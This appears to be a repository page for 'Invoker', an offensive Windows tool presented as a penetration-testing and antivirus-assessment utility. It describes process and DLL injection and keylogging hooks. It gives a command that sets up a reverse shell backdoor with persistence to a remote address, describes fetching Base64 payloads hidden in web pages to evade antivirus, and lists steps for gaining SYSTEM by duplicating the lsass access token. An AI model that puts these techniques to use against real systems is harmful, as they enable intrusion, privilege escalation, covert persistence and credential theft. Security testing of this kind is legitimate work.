Need help with invoker?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

ivan-sincek
248 Stars 66 Forks MIT License 6 Commits 0 Opened issues

Description

Penetration testing utility and antivirus assessment tool.

Services available

!
?

Need anything else?

Contributors list

No Data

Invoker

Penetration testing utility and antivirus assessment tool.

Built with Visual Studio Community 2019 v16.10.2 (64-bit) and tested on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

This repository started to have known signatures and I don't have time to upload new executables each time so you should compile this project yourself.

Learn more about process injection techniques from this article.

Future plans:

  • ~~process hollowing,~~
  • process doppelgänging,
  • process herpaderping,
  • process ghosting,
  • DLL proxying,
  • COM hijacking.

Table of Contents

Invoker Library

Features:

  • invoke the system shells,
  • ~~make direct system calls,~~
  • use Windows Management Instrumentation (WMI),
  • connect to a remote host,
  • terminate a running process,
  • run a new process,
  • dump the memory of a process,
  • tamper with the executable image of a process,
  • inject bytecode into a process,
  • inject DLL into a process,
  • list loaded DLLs of a process,
  • install a hook procedure,
  • enable access token privileges,
  • duplicate the access token of a process and run a new process,
  • download a file,
  • add/edit a registry key,
  • schedule a task,
  • list unquoted service paths and start, stop, or restart a service,
  • replace multiple System32 files.

Some features may require administrative privileges.

Check the Invoker library here. Feel free to use it!

How to Run

Run Invokerx86.exe (32-bit) or Invokerx64.exe (64-bit).

To automate the reverse shell backdoor while adding persistence, run the following command:

Invoker_x64.exe 192.168.8.5:9000

32-bit Invoker can:

  • ~~make direct system calls,~~
  • dump the memory of a 32-bit process,
  • tamper with the executable image of a 32-bit process,
  • inject 32-bit bytecode into a 32-bit process,
  • inject 32-bit DLL into a 32-bit process,
  • list loaded DLLs of a 32-bit process,
  • install a hook procedure from a 32-bit DLL.

64-bit Invoker can:

  • make direct system calls,
  • dump the memory of a 32-bit process,
  • dump the memory of a 64-bit process,
  • ~~tamper with the executable image of a 32-bit process,~~
  • tamper with the executable image of a 64-bit process,
  • inject 32-bit bytecode into a 32-bit process,
  • inject 64-bit bytecode into a 64-bit process,
  • ~~inject 32-bit DLL into a 32-bit process,~~
  • inject 64-bit DLL into a 64-bit process,
  • ~~list loaded DLLs of a 32-bit process,~~
  • list loaded DLLs of a 64-bit process.
  • ~~install a hook procedure from a 32-bit DLL,~~
  • install a hook procedure from a 64-bit DLL.

Bytecode Injection

Elevate privileges by injecting bytecode into a higher-privileged process.

This tool can download the content of a binary file in the memory and inject it into a running process. It can also parse an HTTP response and extract the payload from a custom element, e.g. from

payload
where
payload
is a binary code encoded in Base64.

Check the example at pastebin.com/raw/xf9Trt0d.

This is useful if antivirus is constantly deleting your local payloads.

Also, check an additional example at pastebin.com/raw/iW17rCxH - payload hidden in the image element.

P.S. Bytecodes provided will most certainly not work for you.

Use ngrok to give your local web server a public address.


To see if a process is 32-bit or 64-bit, open Task Manager -> click on

More details
-> go to
Details
tab -> right click on any of the columns -> click on
Select columns
-> check the
Platform
checkbox.

To see if a process is running with administrative privileges, check the

Elevated
checkbox.

Note that different injection techniques have both pros and cons, e.g. some techniques require less access rights, use less suspicious methods, etc.; but they can e.g. crash the process, need some time or special conditions to execute the payload, etc.

Generate a Reverse Shell Payload

Find out how to generate a reverse shell payload from my other project, as well as, how to set up Ncat and multi/handler listeners.

Sometimes bytecode may fail because of bad characters, wrong exit function, or encoding. DLL injection is more reliable.

PowerShell

If you wish to run a PowerShell reverse or bind shell from the Invoker, check my other project.

Just copy and paste any of the one-liners to your PowerShell session.

Direct System Calls

Direct system calls library and assembly were generated with SysWhispers2. Credits to the author! As of this writing, this tool only supports 64-bit direct system calls.

Features:

  • terminate a running process,
  • inject bytecode into a process,
  • inject DLL into a process.

To generate the same library and assembly, run the following command from your preferred console:

python3 syswhispers.py -f NtOpenProcess,NtClose,NtAllocateVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,NtCreateThreadEx,NtTerminateProcess -o syscalls

Check my wrapper around the library here. Feel free to use it!

Make a DLL With a Hook Procedure

Check the simple DLL with a hook procedure here. The hook procedure will invoke a message box on each window close.

Check the keyboard hook procedure (i.e. keylogger) here.

Check the mouse hook procedure that will run a new process on the first mouse click here.

Don't forget to remove all the created artifacts after you are done testing, e.g. remove

keylogger.log
, etc.

Get the LocalSystem Account (NT AUTHORITY\SYSTEM)

Follow these simple steps:

  1. Run the Invoker as administrator.

  2. Enable all access token privileges.

  3. Duplicate the access token from e.g. Local Security Authority Subsystem Service (lsass.exe) and run a new instance of the Invoker.

  4. Within the new Invoker instance, open the Command Prompt and run

    whoami
    , you should now see
    nt authority\system
    .
  5. Enable all access token privileges once again.

  6. Close the old Invoker instance.

Images

Invoker

Figure 1 - Invoker

Add/Edit Registry Key

Figure 2 - Add/Edit Registry Key

Bytecode Injection

Figure 3 - Bytecode Injection

Elevated Privileges

Figure 4 - Elevated Privileges

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.